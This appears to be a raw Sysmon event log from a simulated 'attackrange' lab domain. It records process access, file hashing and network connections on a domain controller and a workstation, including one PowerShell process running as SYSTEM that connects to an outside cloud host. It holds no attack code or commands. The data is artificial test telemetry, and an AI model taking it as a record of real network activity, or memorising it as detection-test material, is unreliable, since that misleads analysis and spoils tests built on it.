21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104665Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104664Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104663Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.227{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104662Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.226{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104661Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.226{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104660Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.226{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104659Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.226{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104658Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.226{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150270Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=F14DFA7DEA4A13E42DE8C5847C4C2688,SHA256=1B99983EACFA0739CC6DBCDD0E4014958355021D99CDF358220E35725623048B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150269Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=6F4800F89769FE3E3EC724EC04714212,SHA256=5819FC88D6B8716E9AA2FBA3E57914A7DAD77D44EA8490275BCBF3C5EC8E8E75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150268Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=A7571BA3BCED942A380567E6FC5F8DDE,SHA256=761048B51E2443154EECDABE5AC5114827DCB502A8B8B4F8F84A08C72D0C2020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150267Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=4914E8838DF5E5445AFDAED24F44B829,SHA256=DFE8CA5FD7D82F959B3030F75243B7C7AFB7EA00C4C74FDB480B56402B5202CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150266Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=0A204E59590394155709C654132F66A7,SHA256=0C6E5BD512592C2F54B92445E4BF6E58EB3B8807BFEE32F3431A59767DE0B402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150265Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.551{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=DB48E035D3E4C60CAEDAAC74812EDC4C,SHA256=F9945887CD0C5F4ABEF1ED25B20FE347BD3894EC2B66931CCE700FF27082AD2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000150264Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:41.005{39BD8DE3-2672-60CA-E003-00000000D101}5836C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58373-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000150263Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:43.051{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=000B20F544DBB117D773538F46B730F2,SHA256=C987BA711CF6B38B077C88E3BCCC0A19BB95C3970A47D433EDCF3D0141BDE59D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104687Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:44.005{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B058780BFAD0E0393D844DC73930E276,SHA256=890344F31011488179E31AC269BCFECEAF501CBBFDEAC104A80AD92685AB5C6F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104686Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:43.228{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15C0-60CA-5008-00000000CF01}5216C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000150272Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:44.703{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F92291E834FFA8F841C41796E66B353,SHA256=DE11869014C62C2933A1FFE5446A64F9E8C80904C41287325FAF2564B3E88887,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150271Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:44.066{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C16A11EE766F833686FECD8566EFC6,SHA256=7A12B4696FA1E6B453738C8AEEBCEBB0BA80C1553B5DA697CC2547884EA35B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104689Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:45.370{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E994EB02DED38A2CCE4911AB260B674,SHA256=9FE361ED7E256F78E5219C30AC0940144DFFF9192A263B7D3D9ADE5B6FB80B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104688Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:45.369{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157BE7C274BBBAD6FA18589668CCA431,SHA256=3D805D2B45655C83FF8E39A9B11625DAB3F7E85359360C58951067457B4A61B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150273Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:45.100{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=487AA8A03862106017AFE2046D408059,SHA256=F0B0B7E3E7086D75B5E96756DC1203543954E6E9576B5FD045FB3AEAC25A9F85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104690Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:46.776{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7531314F980775E3A8FCEC638DC32772,SHA256=30C0F823C51FF2558BC4CF30D9487C1898CE83795C0EFE62CDFD76C8ED3AAEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150275Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:46.233{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AFF22C65B407C24E99E96D59AB73551,SHA256=53604A9CE6A6A6A89F9E070741F28B0761ABE39E2DB95EC76511414687900302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150274Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:46.102{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA5190E0CFC5B2048FA348D0715CB82C,SHA256=51C23C937DEEAC93F0729AF084C8D6FEA4A9BB3C18696DE30777AE5EC9B91995,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104691Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:44.829{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55398-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000150277Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:45.038{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58375-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150276Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:47.133{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB44C43B35D566F3DD7A69BFEEA8C55,SHA256=AD5072E388FFF248CCA47FBA900BA57DA2BCAF082709A5380A8E0B76F05A33B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104692Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:48.142{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4D0D624D96E9DB355568FF97EF1D751,SHA256=808D61BC4928551F7DEB36DDA03B62D536C1B64C8371735973F23AA7D09501ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150278Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:48.147{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918041B805067C07A2DA1E6C6523E470,SHA256=08B30D28BC9BA3BF8371FB0C0E6F69C3AD2C54BB1827BEF0566E471D25DF1EC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104693Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:49.507{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8290B88BFC7580C6F9A7DB67D0B802F5,SHA256=988AF0FF2795B29CC0E5D7C8B680E5A13A6DD001EB2E6031E5C3381BCE2A3C92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150279Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:49.162{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B3CB33B8FA48D758A7A74F6D1B3061,SHA256=A882C256D44353FD79A2F231E7554ED1EDFACC10F83845FA5C8037473A757FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104694Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:50.873{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=483C5ED94123B9F46170460EAC21F45A,SHA256=111FBD42B6EA75CB00CFD46A0A21A2002C4DCB9A9480372901A4DE7F73ED561B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150281Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:50.729{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F87CC7794D713EDB1A315C82E734C7E5,SHA256=496D24A457903E0085978CD0DA1A5E647F98F45E0AC7BACF12AB1F64AE5F6DC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150280Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:50.195{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=672694A3F9736B72179BD472E060FA68,SHA256=A56C1E578A245569944E6D162C89601871AF877689E239389BCF244C1609DA6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150282Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:51.198{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=634BBD86F895E9CDE20C0D8F5A396C59,SHA256=10473E35DCD57291AD79E1268EA2E126BF7E713E8408E8BDF4DD297E0F5C1688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104695Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:52.236{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3389B957896B131503FE8217E4B6A74E,SHA256=21A3C20234E65A4B9536FD7B9175A785FB69D0E09049A77A2A7BC96D1CFF4CA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150284Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:52.213{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C0E775693A95897371775FFDB22ABC8,SHA256=CE97A753F3D2CA50DF36660B06A72CCABCECEA6B8917B076330A4955751FB7C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150283Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:52.144{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8EE971DCEDF41D0BB8FD4A740DAB3E1,SHA256=8BEC91FB78E6C816192C089792DF01E544B60AF73BB5300797E1AC8EB00D091E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104697Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:53.598{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C9BC08E43C2E1939259F6F9334B87EC,SHA256=DEAFF72CD572DDF80CBA974D6ACA71437A62DA2FED8DD04F8DF6E7BBC8F1BD38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104696Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:50.793{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55399-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000150286Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:50.896{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58377-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150285Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:53.228{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=260D03A9F97118945B0A5BDA878B5A46,SHA256=F1A7FDB2C7238843C7B3C49F43A620861CF558A1A1D1275402C448F8E91F7449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104699Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:54.931{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC24589E9135460A66C3AB98E87B2C8,SHA256=6CF3273AED96F29033AD8EC05003E5B1DB2D35433E0CEEBB9A661C320219197B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104698Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:54.279{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 